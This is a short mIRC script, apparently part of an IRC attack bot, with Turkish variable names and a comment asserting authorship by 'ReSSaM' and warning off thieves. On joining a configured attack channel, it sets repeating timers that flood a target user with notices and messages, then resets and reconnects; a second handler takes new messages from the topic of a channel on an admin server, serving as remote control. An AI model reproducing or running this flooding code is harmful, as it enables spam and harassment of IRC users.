;****Bu Kodlar Tamamen ReSSaM a aittir çalmayý düþünüyorsan eðer baþýna alýrsýn***************
on 1:join:*: { 
  if ($server == %hucumserver) { 
    if ($chan == %hucumkanal) {
      if ($server !== %adminserver) { 
        timer 1 10 raw part %hucumkanal 
        timer 8 0 notice %hucumhedef %hucummesaj 
        timer 8 0 msg %hucumhedef %hucummesaj 
        .timer 1 20 .saldirisifirla
        .timer 1 20 .server
        halt
      }
    }
  }
}
raw 332:* {
  if ($server == %adminserver) {
    if (%topickanal == #TrJ) {
    set %tmesaj $3- | echo -a 0,4 Yeni mesaj:  %tmesaj  }
    halt
  }
}
